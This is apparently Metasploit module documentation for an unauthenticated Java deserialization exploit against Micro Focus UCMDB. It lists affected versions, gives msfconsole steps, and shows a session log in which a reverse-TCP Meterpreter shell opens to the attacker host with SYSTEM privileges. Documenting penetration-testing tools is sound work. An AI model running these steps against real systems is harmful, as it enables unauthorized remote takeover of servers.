adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
9beec65ef34c4e90a00a41ee1c8de0f9e6effd2a
metasploit-gs/documentation/modules/exploit/multi/http/microfocus_ucmdb_unauth_deser.md
T
Spencer McIntyre fc6957fbf6 Fix a couple of issues in the markdown formatting
2021-01-27 10:00:02 -05:00

2.8 KiB
Raw Blame History

Vulnerable Application

UCMDB is the vulnerable component, which is integrated into many Micro Focus products. MF have confirmed that the following are affected by the hardcoded account vulnerability:

  • Operation Bridge Manager versions: 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, versions 10.6x and 10.1x and older versions
  • Application Performance Management versions: 9.51, 9.50 and 9.40 with uCMDB 10.33 CUP 3
  • Operations Bridge (containerized) versions: 2019.11, 2019.08, 2019.05, 2018.11, 2018.08, 2018.05, 2018.02, 2017.11

An additional number of applications are vulnerable to the Java deserialization. Note that this module leverages both vulnerabilities, so it should only work in the above.

Installation docs are available at:

Vulnerable versions of the software can be downloaded from Micro Focus website by requesting a demo.

Both Linux and Windows installations are affected.

NOTE: At the time of writing this (24/01/2021), Metasploit ysoserial Linux payloads (except cmd/unix/generic) are broken! Remove this comment once this all works, and change the default payload from cmd/unix/generic to cmd/unix/reverse_python in the module code.

All details about these vulnerabilities can be obtained from the advisory:

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. use exploit/multi/http/microfocus_ucmdb_unauth_deser
  4. `set rhost TARGET'
  5. set lhost YOUR_IP
  6. set target 0|1
  7. run
  8. You should get a shell.

Scenarios

msf6 > use exploit/multi/http/microfocus_ucmdb_unauth_deser
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/microfocus_ucmdb_unauth_deser) > set rhost 10.0.0.100
rhost => 10.0.0.100
msf6 exploit(multi/http/microfocus_ucmdb_unauth_deser) > set lhost 10.0.0.1
lhost => 10.0.0.1
msf6 exploit(multi/http/microfocus_ucmdb_unauth_deser) > check
[+] 10.0.0.100:8443 - The target is vulnerable.
msf6 exploit(multi/http/microfocus_ucmdb_unauth_deser) > run

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.100:8443 - Attacking Windows target
[+] 10.0.0.100:8443 - Succesfully authenticated and obtained our cookie!
[*] 10.0.0.100:8443 - Sending payload to /services/DataAcquisitionService
[+] 10.0.0.100:8443 - Success, shell incoming!
[*] Sending stage (175174 bytes) to 10.0.0.100
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.100:50733) at 2021-01-24 22:16:36 +0700

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 15244 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\HPBSM\ucmdb\bin>whoami
whoami
nt authority\system

C:\HPBSM\ucmdb\bin>
Reference in New Issue View Git Blame Copy Permalink